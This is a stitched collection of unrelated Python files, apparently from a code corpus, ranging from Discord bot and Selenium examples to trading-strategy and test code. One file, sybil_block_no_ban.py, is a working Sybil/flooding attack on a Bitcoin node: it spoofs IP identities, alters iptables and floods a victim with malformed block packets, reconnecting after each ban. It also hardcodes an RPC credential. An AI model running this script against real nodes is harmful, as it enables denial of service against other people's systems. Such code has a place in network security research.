weight_file3 = '../pre-trained/300W_LP_models/fsanet_noS_capsule_3_16_2_192_5/fsanet_noS_capsule_3_16_2_192_5.h5'
model2.load_weights(weight_file2)
print('Finished loading model 2.')
model3.load_weights(weight_file3)
print('Finished loading model 3.')
inputs = Input(shape=(64,64,3))
x1 = model1(inputs) #1x1
x2 = model2(inputs) #var
x3 = model3(inputs) #w/o
avg_model = Average()([x1,x2,x3])
model = Model(inputs=inputs, outputs=avg_model)
# load our serialized face detector from disk
print("[INFO] loading face detector...")
protoPath = os.path.sep.join(["face_detector", "deploy.prototxt"])
modelPath = os.path.sep.join(["face_detector",
"res10_300x300_ssd_iter_140000.caffemodel"])
net = cv2.dnn.readNetFromCaffe(protoPath, modelPath)
# capture video
cap = cv2.VideoCapture(0)
# cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1024*1)
# cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 768*1)
while True:
# get video frame
ret, input_img = cap.read()
img_idx = img_idx + 1
img_h, img_w, _ = np.shape(input_img)
blob = cv2.dnn.blobFromImage(cv2.resize(input_img, (300, 300)), 1.0,
(300, 300), (104.0, 177.0, 123.0))
net.setInput(blob)
detected = net.forward()
faces = np.empty((detected.shape[2], img_size, img_size, 3))
input_img = draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model)
# cv2.imwrite('img/'+str(img_idx)+'.png',input_img)
cv2.imshow("result", input_img)
key = cv2.waitKey(1)
if __name__ == '__main__':
main()
| 2.71875 | 3 |
examples/app_commands/slash_autocomplete.py | Mihitoko/pycord | 0 | 5010 | import discord
from discord.commands import option
bot = discord.Bot(debug_guilds=[...])
COLORS = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"]
LOTS_OF_COLORS = [
"aliceblue",
"antiquewhite",
"aqua",
"aquamarine",
"azure",
"beige",
"bisque",
"blueviolet",
"brown",
"burlywood",
"cadetblue",
"cornflowerblue",
"cornsilk",
"crimson",
"cyan",
"darkblue",
"deepskyblue",
"dimgray",
"dimgrey",
"dodgerblue",
"firebrick",
"floralwhite",
"forestgreen",
"fuchsia",
"gainsboro",
"ghostwhite",
"gold",
"goldenrod",
"gray",
"green",
"greenyellow",
"grey",
"honeydew",
"hotpink",
"indianred",
"indigo",
"ivory",
"khaki",
"lavender",
"lavenderblush",
"lawngreen",
"lightcoral",
"maroon",
"mediumaquamarine",
"mediumblue",
"mediumorchid",
"midnightblue",
"navajowhite",
"navy",
"oldlace",
"olive",
"olivedrab",
"orange",
"orangered",
"orchid",
"palegoldenrod",
"palegreen",
"plum",
"powderblue",
"purple",
"red",
"rosybrown",
"royalblue",
"saddlebrown",
"sienna",
"springgreen",
"steelblue",
"tan",
"teal",
"thistle",
"tomato",
"turquoise",
"violet",
"wheat",
"white",
"whitesmoke",
"yellow",
"yellowgreen",
]
BASIC_ALLOWED = [...] # This would normally be a list of discord user IDs for the purpose of this example
async def color_searcher(ctx: discord.AutocompleteContext):
"""
Returns a list of matching colors from the LOTS_OF_COLORS list.
In this example, we've added logic to only display any results in the
returned list if the user's ID exists in the BASIC_ALLOWED list.
This is to demonstrate passing a callback in the discord.utils.basic_autocomplete function.
"""
return [color for color in LOTS_OF_COLORS if ctx.interaction.user.id in BASIC_ALLOWED]
async def get_colors(ctx: discord.AutocompleteContext):
"""Returns a list of colors that begin with the characters entered so far."""
return [color for color in COLORS if color.startswith(ctx.value.lower())]
async def get_animals(ctx: discord.AutocompleteContext):
"""Returns a list of animals that are (mostly) the color selected for the "color" option."""
picked_color = ctx.options["color"]
if picked_color == "red":
return ["cardinal", "ladybug"]
elif picked_color == "orange":
return ["clownfish", "tiger"]
elif picked_color == "yellow":
return ["goldfinch", "banana slug"]
elif picked_color == "green":
return ["tree frog", "python"]
elif picked_color == "blue":
return ["blue jay", "blue whale"]
elif picked_color == "indigo":
return ["eastern indigo snake"] # Needs to return an iterable even if only one item
elif picked_color == "violet":
return ["purple emperor butterfly", "orchid dottyback"]
else:
return ["rainbowfish"]
@bot.slash_command(name="ac_example")
@option("color", description="Pick a color!", autocomplete=get_colors)
@option("animal", description="Pick an animal!", autocomplete=get_animals)
async def autocomplete_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
Demonstrates using ctx.options to create options
that are dependent on the values of other options.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, the callback uses the input
from the color option to return an iterable of animals
"""
await ctx.respond(f"You picked {color} for the color, which allowed you to choose {animal} for the animal.")
@bot.slash_command(name="ac_basic_example")
@option(
"color",
description="Pick a color from this big list!",
autocomplete=discord.utils.basic_autocomplete(color_searcher),
# Demonstrates passing a callback to discord.utils.basic_autocomplete
)
@option(
"animal",
description="Pick an animal from this small list",
autocomplete=discord.utils.basic_autocomplete(["snail", "python", "cricket", "orca"]),
# Demonstrates passing a static iterable discord.utils.basic_autocomplete
)
async def autocomplete_basic_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
This demonstrates using the discord.utils.basic_autocomplete helper function.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, a static iterable is passed.
While a small amount of values for `animal` are used in this example,
iterables of any length can be passed to discord.utils.basic_autocomplete
Note that the basic_autocomplete function itself will still only return a maximum of 25 items.
"""
await ctx.respond(f"You picked {color} as your color, and {animal} as your animal!")
bot.run("TOKEN")
| 2.671875 | 3 |
tools/Networking/sybil_block_no_ban.py | simewu/bitcoin_researcher | 1 | 5011 | from _thread import start_new_thread
from bitcoin.messages import *
from bitcoin.net import CAddress
from bitcoin.core import CBlock
from io import BytesIO as _BytesIO
import atexit
import bitcoin
import fcntl
import hashlib
import json
import os
import random
import re
import socket
import struct
import sys
import time
import datetime
if os.geteuid() != 0:
sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n")
# Specify the attacker's genuine IP
attacker_ip = input('\nEnter attacker\'s IP address: ')
# Specify the victim's IP, and port (8333 for Bitcoin)
victim_ip = input('Enter victim\'s IP address: ')
victim_port = 8333
# How many identities should run simultaneously
num_identities = 8
# While attacking the victim, wait this many seconds before sending each version message
seconds_between_version_packets = 0.1
identity_interface = [] # Keeps the IP alias interface and IP for each successful connection
identity_address = [] # Keeps the IP and port for each successful connection
identity_socket = [] # Keeps the socket for each successful connection
# The file where the iptables backup is saved, then restored when the script ends
iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules'
# Send commands to the Linux terminal
def terminal(cmd):
return os.popen(cmd).read()
# Send commands to the Bitcoin Core Console
def bitcoin(cmd):
return os.popen('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=<KEY>GW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 ' + cmd).read()
# Generate a random identity using the broadcast address template
def random_ip():
# By forcing the IP to be above a certain threshhold, it prevents a lot of errors
minimum_ip_range = min(int(attacker_ip.split('.')[-1]), int(victim_ip.split('.')[-1])) + 1
while(True):
ip = broadcast_address
old_ip = ''
while(old_ip != ip):
old_ip = ip
ip = ip.replace('255', str(random.randint(minimum_ip_range, 255)), 1)
# Don't accept already assigned IPs
if ip == default_gateway: continue
if ip == victim_ip: continue
if ip not in [x[0] for x in identity_address]: break
return ip
#return f'10.0.{str(random.randint(0, 255))}.{str(random.randint(0, 255))}'
# Checking the internet by sending a single ping to Google
#def internet_is_active():
# return os.system('ping -c 1 google.com') == 0
# If all else fails, we can use this to recover the network
#def reset_network():
# print('Resetting network...')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} down')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} up')
# Create an alias for a specified identity
def ip_alias(ip_address):
global alias_num
print(f'Setting up IP alias {ip_address} on {network_interface}')
interface = f'{network_interface}:{alias_num}'
terminal(f'sudo ifconfig {interface} {ip_address} netmask 255.255.255.0 broadcast {broadcast_address} up')
alias_num += 1
return interface
# Construct a block packet using python-bitcoinlib
def block_packet_bytes():
hashPrevBlock = bytearray(random.getrandbits(8) for _ in range(32))
hashMerkleRoot = bytearray(random.getrandbits(8) for _ in range(32))
nTime = int((datetime.datetime.now() - datetime.datetime(1970, 1, 1)).total_seconds())#.to_bytes(8, 'little')
nNonce = random.getrandbits(32)
msg = CBlock(
nVersion=bitcoin_protocolversion,
hashPrevBlock=hashPrevBlock,
#hashPrevBlock='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
hashMerkleRoot=hashMerkleRoot,
#hashMerkleRoot='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
nTime=nTime,
nBits=0,
nNonce=nNonce,
vtx=()
)
name = 'block'
f = _BytesIO()
msg.stream_serialize(f)
body = f.getvalue()
res = b'\xf9\xbe\xb4\xd9'
res += name.encode()
res += b"\x00" * (12 - len(name))
res += struct.pack(b"<I", len(body))
#th = hashlib.sha256(body).digest() # add checksum
#h = hashlib.sha256(th).digest()
#res += h[:4]
res += bytearray(random.getrandbits(8) for _ in range(4))
res += body
return res
# Construct a version packet using python-bitcoinlib
def version_packet(src_ip, dst_ip, src_port, dst_port):
msg = msg_version(bitcoin_protocolversion)
msg.nVersion = bitcoin_protocolversion
msg.addrFrom.ip = src_ip
msg.addrFrom.port = src_port
msg.addrTo.ip = dst_ip
msg.addrTo.port = dst_port
# Default is /python-bitcoinlib:0.11.0/
msg.strSubVer = bitcoin_subversion.encode() # Look like a normal node
return msg
# Close a connection
def close_connection(socket, ip, port, interface):
socket.close()
terminal(f'sudo ifconfig {interface} {ip} down')
if socket in identity_socket: identity_socket.remove(socket)
else: del socket
if interface in identity_interface: identity_interface.remove(interface)
if (ip, port) in identity_address: identity_address.remove((ip, port))
print(f'Successfully closed connection to ({ip} : {port})')
# Creates a fake connection to the victim
def make_fake_connection(src_ip, dst_ip, verbose=True):
src_port = random.randint(1024, 65535)
dst_port = victim_port
print(f'Creating fake identity ({src_ip} : {src_port}) to connect to ({dst_ip} : {dst_port})...')
interface = ip_alias(src_ip)
identity_interface.append(interface)
if verbose: print(f'Successfully set up IP alias on interface {interface}')
if verbose: print('Resulting ifconfig interface:')
if verbose: print(terminal(f'ifconfig {interface}').rstrip() + '\n')
if verbose: print('Setting up iptables configurations')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST -j DROP')
if verbose: print('Creating network socket...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if verbose: print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
while success == -1:
print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
time.sleep(1)
print(network_interface)
if verbose: print(f'Binding socket to ({src_ip} : {src_port})...')
s.bind((src_ip, src_port))
if verbose: print(f'Connecting ({src_ip} : {src_port}) to ({dst_ip} : {dst_port})...')
try:
s.connect((dst_ip, dst_port))
except:
close_connection(s, src_ip, src_port, interface)
make_fake_connection(random_ip(), dst_ip, False)
return
# Send version packet
version = version_packet(src_ip, dst_ip, src_port, dst_port)
s.send(version.to_bytes())
# Get verack packet
verack = s.recv(1924)
# Send verack packet
verack = msg_verack(bitcoin_protocolversion)
s.send(verack.to_bytes())
# Get verack packet
verack = s.recv(1024)
if verbose: print('Connection successful!')
identity_address.append((src_ip, src_port))
identity_socket.append(s)
# Listen to the connections for future packets
if verbose: print('Attaching attacker script {interface}')
try:
start_new_thread(attack, (), {
'socket': s,
'src_ip': src_ip,
'src_port': src_port,
'dst_ip': dst_ip,
'dst_port': dst_port,
'interface': interface
})
except:
print('Error: unable to start thread to sniff interface {interface}')
# Send version repeatedly, until banned
def attack(socket, src_ip, src_port, dst_ip, dst_port, interface):
block = block_packet_bytes()
while True:
if seconds_between_version_packets != 0:
time.sleep(seconds_between_version_packets)
try:
socket.send(block)
except Exception as e:
print(e)
break
close_connection(socket, src_ip, src_port, interface)
print(f'Peer was banned ({src_ip} : {src_port})')
make_fake_connection(random_ip(), dst_ip, False)
# Initialize the network
def initialize_network_info():
print('Retrieving network info...')
global default_gateway, network_interface, broadcast_address
# Get the network interface of the default gateway
m = re.search(r'default +via +([^ ]+) +dev +([^ ]+)', terminal('ip route'))
if m != None:
default_gateway = m.group(1).strip()
network_interface = m.group(2).strip()
else:
print('Error: Network interface couldn\'t be found.')
sys.exit()
# Get the broadcast address of the network interface
# Used as an IP template of what can change, so that packets still come back to the sender
m = re.search(r'broadcast ([^ ]+)', terminal(f'ifconfig {network_interface}'))
if m != None:
broadcast_address = m.group(1).strip()
else:
print('Error: Network broadcast IP couldn\'t be found.')
sys.exit()
# Initialize Bitcoin info
def initialize_bitcoin_info():
print('Retrieving bitcoin info...')
global bitcoin_subversion
global bitcoin_protocolversion
bitcoin_subversion = '/Satoshi:0.18.0/'
bitcoin_protocolversion = 70015
try:
network_info = None #json.loads(bitcoin('getnetworkinfo'))
if 'subversion' in network_info:
bitcoin_subversion = network_info['subversion']
if 'protocolversion' in network_info:
bitcoin_protocolversion = network_info['protocolversion']
except:
pass
# Save a backyp of the iptable rules
def backup_iptables():
terminal(f'iptables-save > {iptables_file_path}')
# Restore the backup of the iptable rules
def cleanup_iptables():
if(os.path.exists(iptables_file_path)):
print('Cleaning up iptables configuration')
terminal(f'iptables-restore < {iptables_file_path}')
os.remove(iptables_file_path)
# Remove all ip aliases that were created by the script
def cleanup_ipaliases():
for i in range(0, len(identity_address)):
try:
ip = identity_address[i][0]
interface = identity_interface[i]
print(f'Cleaning up IP alias {ip} on {interface}')
terminal(f'sudo ifconfig {interface} {ip} down')
except: pass
# This function is ran when the script is stopped
def on_close():
print('Closing open sockets')
for socket in identity_socket:
socket.close()
cleanup_ipaliases()
cleanup_iptables()
print('Cleanup complete. Goodbye.')
#print('Verifying that internet works...')
#if not internet_is_active():
# reset_network()
# This is the first code to run
if __name__ == '__main__':
global alias_num
alias_num = 0 # Increments each alias
initialize_network_info()
initialize_bitcoin_info()
atexit.register(on_close) # Make on_close() run when the script terminates
cleanup_iptables() # Restore any pre-existing iptables before backing up, just in case if the computer shutdown without restoring
backup_iptables()
# Create the connections
for i in range(1, num_identities + 1):
try:
make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip)
except ConnectionRefusedError:
print('Connection was refused. The victim\'s node must not be running.')
print(f'Successful connections: {len(identity_address)}\n')
# Prevent the script from terminating when the sniff function is still active
while 1:
time.sleep(60)
| 2.25 | 2 |
spider/db.py | aloneZERO/douban-movie-visualization | 0 | 5012 | <reponame>aloneZERO/douban-movie-visualization
#!python3
'''
数据库操作类
author: justZero
email: <EMAIL>
date: 2017-8-6
'''
import time
import pandas as pd
import numpy as np
import pymysql
import pymysql.cursors
import pprint
class MySQLdb(object):
def __init__(self):
self.conn = pymysql.connect(
host='localhost',
user='root',
passwd='<PASSWORD>',
db='douban_movie',
port=8889,
charset='utf8',
cursorclass=pymysql.cursors.DictCursor)
self.conn.autocommit(True)
self.cursor = self.conn.cursor()
def close(self):
self.conn.close()
self.cursor.close()
# 批量插入
def __insert_many(self, sql, params):
self.cursor.executemany(sql, params)
# 电影数据插入
def insert_movie(self, params):
sql = 'insert into movie(movieId,title,url,cover,rate,director,composer,actor,category,district,language,showtime,length,othername,description) '+ \
'values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'
self.__insert_many(sql, params)
# 统计数据插入
def insert_rate(self, params):
sql = 'insert into rate(name,category,rate) values(%s,%s,%s)'
self.__insert_many(sql, params)
if __name__ == '__main__':
inputFile = 'data/douban_movie_clean.txt'
movies_df = pd.read_csv(inputFile, sep='^')
movies = np.array(movies_df).tolist()
db = MySQLdb()
try:
db.insert_movie(movies)
except Exception as e:
raise e
finally:
db.close()
| 3.03125 | 3 |
examples/rxff-serial/run.py | sctiwari/EZFF_ASE | 3 | 5013 | <reponame>sctiwari/EZFF_ASE<filename>examples/rxff-serial/run.py
import ezff
from ezff.interfaces import gulp, qchem
# Define ground truths
gt_gs = qchem.read_structure('ground_truths/optCHOSx.out')
gt_gs_energy = qchem.read_energy('ground_truths/optCHOSx.out')
gt_scan = qchem.read_structure('ground_truths/scanCHOSx.out')
gt_scan_energy = qchem.read_energy('ground_truths/scanCHOSx.out')
def my_error_function(rr):
# Get a unique path for GULP jobs from the MPI rank. Set to '0' for serial jobs
try:
path = str(pool.rank)
except:
path = '0'
# Calculate Ground State
md_gs_job = gulp.job(path = path)
md_gs_job.structure = gt_gs
md_gs_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff')
md_gs_job.options['pbc'] = False
md_gs_job.options['relax_atoms'] = False
md_gs_job.options['relax_cell'] = False
# Run GULP calculation
md_gs_job.run(command='gulp')
# Read output from completed GULP job and clean-up
md_gs_energy = md_gs_job.read_energy()
md_gs_job.cleanup()
# Calculate PES Scan
md_scan_job = gulp.job(path = path)
md_scan_job.structure = gt_scan
md_scan_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff')
md_scan_job.options['pbc'] = False
md_scan_job.options['relax_atoms'] = False
md_scan_job.options['relax_cell'] = False
# Run GULP calculation
md_scan_job.run(command='gulp')
# Read output from completed GULP job and clean-up
md_scan_energy = md_scan_job.read_energy()
md_scan_job.cleanup()
# Calculate error
total_error = ezff.error_energy( md_scan_energy-md_gs_energy, gt_scan_energy-gt_gs_energy, weights = 'uniform')
return [total_error]
# Read template and variable ranges
bounds = ezff.read_variable_bounds('variable_bounds', verbose=False)
template = ezff.read_forcefield_template('template')
problem = ezff.OptProblem(num_errors = 1, variable_bounds = bounds, error_function = my_error_function, template = template)
algorithm = ezff.Algorithm(problem, 'NSGAII', population = 16)
ezff.optimize(problem, algorithm, iterations = 5)
| 2.078125 | 2 |
dev_files/utils.py | dylanwal/unit_parse | 1 | 5014 | import logging
from testing_func import testing_func, test_logger
from unit_parse import logger, Unit, Q
from unit_parse.utils import *
test_logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
test_split_list = [
# positive control (changes)
[["fish","pig", "cow"], ["f", "is", "h", "pig", "cow"], {"chunks": ["is"]}],
[["fish", Unit("g"), "cow"], ["f", "is", "h", Unit("g"), "cow"], {"chunks": ["is"]}],
[["fishpigcow"], ["f", "i", "shpigcow"], {"chunks": ["i"]}],
[["fishpigcow"], ["f", "i", "shpig", "c", "ow"], {"chunks": ["i", "c"]}],
# negative control (no changes)
[["fish"], ["fish"], {"chunks": ["fish"]}],
[["fishpigcow"], ["fishpigcow"], {"chunks": ["z"]}],
[[Unit("g")], [Unit("g")], {"chunks": ["is"]}],
]
testing_func(split_list, test_split_list)
test_round_off = [ # [Input, Output]
# positive control (works)
[234.2342300000001, 234.23423, {"sig_digit": 15}],
[234.2342399999999999, 234.23424, {"sig_digit": 15}],
[234.2342300000001, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 200, {"sig_digit": 1}],
[-234.2342399999999999, -200, {"sig_digit": 1}],
[-234.2342399999999999, -234.23424, {"sig_digit": 15}],
# negative control (fails)
]
testing_func(sig_figs, test_round_off)
test_list_depth = [ # [Input, Output]
# positive control (works)
["", 0],
[[], 0],
["asds", 0],
[1, 0],
[["aaa"], 1],
[[["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[[["aaa"], ["aaa"], ["aaa"]]], 3],
# negative control (fails)
]
testing_func(get_list_depth, test_list_depth)
test_remove_empty_cells = [ # [Input, Output]
# positive control (works)
[[], None],
[[""], None],
[["asds"], ["asds"]],
[1, 1],
[["aaa", ""], ["aaa"]],
[["aaa", []], ["aaa"]],
[[["aaa", []]], [["aaa"]]],
[[["aaa", [""]]], [["aaa"]]],
# negative control (fails)
]
testing_func(remove_empty_cells, test_remove_empty_cells)
examples_quantity_difference = [
[Q("5 g"), Q("0.5"), {"quantity2": Q("10 g")}],
[5, 1, {"quantity2": Q("10 g")}],
]
testing_func(quantity_difference, examples_quantity_difference)
| 2.53125 | 3 |
genlicense.py | d53dave/python-crypto-licensecheck | 0 | 5015 | <reponame>d53dave/python-crypto-licensecheck
import sys
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA
def sign_data(key, data, output_file):
with open(key, 'r', encoding='utf-8') as keyFile:
rsakey = RSA.importKey(keyFile.read())
signer = pkcs1_15.new(rsakey)
digest = SHA256.new(data.encode('utf-8'))
with open(output_file, 'wb') as out:
out.write(signer.sign(digest))
if __name__ == '__main__':
key_file = sys.argv[1]
input_string = sys.argv[2]
out_file = sys.argv[3]
sign_data(key_file, input_string, out_file)
| 2.5625 | 3 |
freqtrade/strategy/informative_decorator.py | Fractate/freqbot | 1 | 5016 | <reponame>Fractate/freqbot
from typing import Any, Callable, NamedTuple, Optional, Union
from pandas import DataFrame
from freqtrade.exceptions import OperationalException
from freqtrade.strategy.strategy_helper import merge_informative_pair
PopulateIndicators = Callable[[Any, DataFrame, dict], DataFrame]
class InformativeData(NamedTuple):
asset: Optional[str]
timeframe: str
fmt: Union[str, Callable[[Any], str], None]
ffill: bool
def informative(timeframe: str, asset: str = '',
fmt: Optional[Union[str, Callable[[Any], str]]] = None,
ffill: bool = True) -> Callable[[PopulateIndicators], PopulateIndicators]:
"""
A decorator for populate_indicators_Nn(self, dataframe, metadata), allowing these functions to
define informative indicators.
Example usage:
@informative('1h')
def populate_indicators_1h(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)
return dataframe
:param timeframe: Informative timeframe. Must always be equal or higher than strategy timeframe.
:param asset: Informative asset, for example BTC, BTC/USDT, ETH/BTC. Do not specify to use
current pair.
:param fmt: Column format (str) or column formatter (callable(name, asset, timeframe)). When not
specified, defaults to:
* {base}_{quote}_{column}_{timeframe} if asset is specified.
* {column}_{timeframe} if asset is not specified.
Format string supports these format variables:
* {asset} - full name of the asset, for example 'BTC/USDT'.
* {base} - base currency in lower case, for example 'eth'.
* {BASE} - same as {base}, except in upper case.
* {quote} - quote currency in lower case, for example 'usdt'.
* {QUOTE} - same as {quote}, except in upper case.
* {column} - name of dataframe column.
* {timeframe} - timeframe of informative dataframe.
:param ffill: ffill dataframe after merging informative pair.
"""
_asset = asset
_timeframe = timeframe
_fmt = fmt
_ffill = ffill
def decorator(fn: PopulateIndicators):
informative_pairs = getattr(fn, '_ft_informative', [])
informative_pairs.append(InformativeData(_asset, _timeframe, _fmt, _ffill))
setattr(fn, '_ft_informative', informative_pairs)
return fn
return decorator
def _format_pair_name(config, pair: str) -> str:
return pair.format(stake_currency=config['stake_currency'],
stake=config['stake_currency']).upper()
def _create_and_merge_informative_pair(strategy, dataframe: DataFrame, metadata: dict,
inf_data: InformativeData,
populate_indicators: PopulateIndicators):
asset = inf_data.asset or ''
timeframe = inf_data.timeframe
fmt = inf_data.fmt
config = strategy.config
if asset:
# Insert stake currency if needed.
asset = _format_pair_name(config, asset)
else:
# Not specifying an asset will define informative dataframe for current pair.
asset = metadata['pair']
if '/' in asset:
base, quote = asset.split('/')
else:
# When futures are supported this may need reevaluation.
# base, quote = asset, ''
raise OperationalException('Not implemented.')
# Default format. This optimizes for the common case: informative pairs using same stake
# currency. When quote currency matches stake currency, column name will omit base currency.
# This allows easily reconfiguring strategy to use different base currency. In a rare case
# where it is desired to keep quote currency in column name at all times user should specify
# fmt='{base}_{quote}_{column}_{timeframe}' format or similar.
if not fmt:
fmt = '{column}_{timeframe}' # Informatives of current pair
if inf_data.asset:
fmt = '{base}_{quote}_' + fmt # Informatives of other pairs
inf_metadata = {'pair': asset, 'timeframe': timeframe}
inf_dataframe = strategy.dp.get_pair_dataframe(asset, timeframe)
inf_dataframe = populate_indicators(strategy, inf_dataframe, inf_metadata)
formatter: Any = None
if callable(fmt):
formatter = fmt # A custom user-specified formatter function.
else:
formatter = fmt.format # A default string formatter.
fmt_args = {
'BASE': base.upper(),
'QUOTE': quote.upper(),
'base': base.lower(),
'quote': quote.lower(),
'asset': asset,
'timeframe': timeframe,
}
inf_dataframe.rename(columns=lambda column: formatter(column=column, **fmt_args),
inplace=True)
date_column = formatter(column='date', **fmt_args)
if date_column in dataframe.columns:
raise OperationalException(f'Duplicate column name {date_column} exists in '
f'dataframe! Ensure column names are unique!')
dataframe = merge_informative_pair(dataframe, inf_dataframe, strategy.timeframe, timeframe,
ffill=inf_data.ffill, append_timeframe=False,
date_column=date_column)
return dataframe
| 2.640625 | 3 |
codigo_das_aulas/aula_09/aula_09_03.py | VeirichR/curso-python-selenium | 234 | 5017 | from functools import partial
from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import (
WebDriverWait
)
def esperar_elemento(elemento, webdriver):
print(f'Tentando encontrar "{elemento}"')
if webdriver.find_elements_by_css_selector(elemento):
return True
return False
esperar_botao = partial(esperar_elemento, 'button')
esperar_sucesso = partial(esperar_elemento, '#finished')
url = 'https://selenium.dunossauro.live/aula_09_a.html'
driver = Firefox()
wdw = WebDriverWait(driver, 10)
driver.get(url)
wdw.until(esperar_botao, 'Deu ruim')
driver.find_element_by_css_selector('button').click()
wdw.until(
esperar_sucesso,
'A mensagem de sucesso não apareceu'
)
sucesso = driver.find_element_by_css_selector('#finished')
assert sucesso.text == 'Carregamento concluído'
| 2.90625 | 3 |
prae/losses.py | irom-lab/RL_Generalization | 24 | 5018 | <gh_stars>10-100
import torch
from torch import nn
from prae.distances import square_dist, HingedSquaredEuclidean
class Loss(nn.Module):
"""
"""
def __init__(self, hinge, neg=True, rew=True):
"""
"""
super().__init__()
self.reward_loss = square_dist
# If False, no negative sampling
self.neg = neg
# If False, no reward loss
self.rew = rew
self.distance = HingedSquaredEuclidean(eps=hinge)
def forward(self, z_c, z_l, z_n, z_f, r, r_e):
"""
"""
# Transition loss
transition_loss = self.distance.distance(z_n, z_l).mean()
# Reward loss
if self.rew:
reward_loss = 0.5 * self.reward_loss(r, r_e).mean()
else:
reward_loss = torch.zeros_like(transition_loss)
# Negative los
if self.neg:
z_n = tile(z_n, z_f)
batch_size = z_c.shape[0]
negative_loss = self.distance.negative_distance(z_n, z_f).sum()/batch_size
else:
negative_loss = torch.zeros_like(transition_loss)
return transition_loss, reward_loss, negative_loss
def tile(embedding, example):
"""
"""
n = example.shape[0]//embedding.shape[0]
embedding = embedding.unsqueeze(1).repeat(1, n, 1)
embedding = squeeze_embedding(embedding)
return embedding
def squeeze_embedding(x):
"""
"""
b, n, d = x.shape
x = x.reshape(b*n, d)
return x
| 2.1875 | 2 |
orion/modules/active/wolfram.py | isathish/ai_opesource | 0 | 5019 | <reponame>isathish/ai_opesource
"""
Handles most general questions (including math!)
Requires:
- WolframAlpha API key
Usage Examples:
- "How tall is Mount Everest?"
- "What is the derivative of y = 2x?"
"""
import wolframalpha
from orion.classes.module import Module
from orion.classes.task import ActiveTask
from orion import settings
wolfram_client = wolframalpha.Client(settings.WOLFRAM_KEY)
class AnswerTask(ActiveTask):
def match(self, text):
return True
def action(self, text):
try:
query = wolfram_client.query(text)
self.speak(next(query.results).text)
except:
self.speak(settings.NO_MODULES)
class Wolfram(Module):
def __init__(self):
tasks = [AnswerTask()]
super(Wolfram, self).__init__('wolfram', tasks, priority=0)
| 2.65625 | 3 |
polymatch/matchers/standard.py | linuxdaemon/poly-match | 0 | 5020 | <reponame>linuxdaemon/poly-match
from polymatch import PolymorphicMatcher
class ExactMatcher(PolymorphicMatcher):
def compile_pattern(self, raw_pattern):
return raw_pattern
def compile_pattern_cs(self, raw_pattern):
return raw_pattern
def compile_pattern_ci(self, raw_pattern):
return raw_pattern.lower()
def compile_pattern_cf(self, raw_pattern):
return raw_pattern.casefold()
def match_text(self, pattern, text):
return text == pattern
@classmethod
def get_type(cls):
return "exact"
class ContainsMatcher(PolymorphicMatcher):
def compile_pattern(self, raw_pattern):
return raw_pattern
def compile_pattern_cs(self, raw_pattern):
return raw_pattern
def compile_pattern_ci(self, raw_pattern):
return raw_pattern.lower()
def compile_pattern_cf(self, raw_pattern):
return raw_pattern.casefold()
def match_text(self, pattern, text):
return pattern in text
@classmethod
def get_type(cls):
return "contains"
| 2.90625 | 3 |
djcorsche/settings_default.py | carthage-college/django-djcorsche | 0 | 5021 | <reponame>carthage-college/django-djcorsche
"""
Django settings for project.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# Debug
#DEBUG = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
INFORMIX_DEBUG = "debug"
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
SECRET_KEY = ''
ALLOWED_HOSTS = []
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Chicago'
SITE_ID = 1
USE_I18N = False
USE_L10N = False
USE_TZ = False
DEFAULT_CHARSET = 'utf-8'
FILE_CHARSET = 'utf-8'
